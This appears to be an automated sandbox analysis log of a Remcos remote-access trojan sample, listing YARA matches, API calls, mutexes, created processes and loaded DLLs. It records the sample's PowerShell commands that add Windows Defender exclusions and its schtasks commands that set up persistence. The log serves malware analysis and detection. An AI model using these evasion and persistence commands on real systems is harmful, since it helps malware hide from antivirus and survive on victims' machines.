                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: jdSldfVS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, DSSwTQO1NWXixqGlCL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, DSSwTQO1NWXixqGlCL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, DSSwTQO1NWXixqGlCL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@23/17@1/2
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00417952
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,17_2_0040F474
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,17_2_0041B4A8
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile created: C:\Users\user\AppData\Roaming\jdSldfVS.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3048:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMutant created: \Sessions\1\BaseNamedObjects\donmtwtGg
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HKC0PV
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_03
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAF95.tmpJump to behavior
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: HUED23EDE5UGRFQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: HUED23EDE5UGRFQ.exeReversingLabs: Detection: 31%
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile read: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe C:\Users\user\AppData\Roaming\jdSldfVS.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: wininet.dllJump to behavior
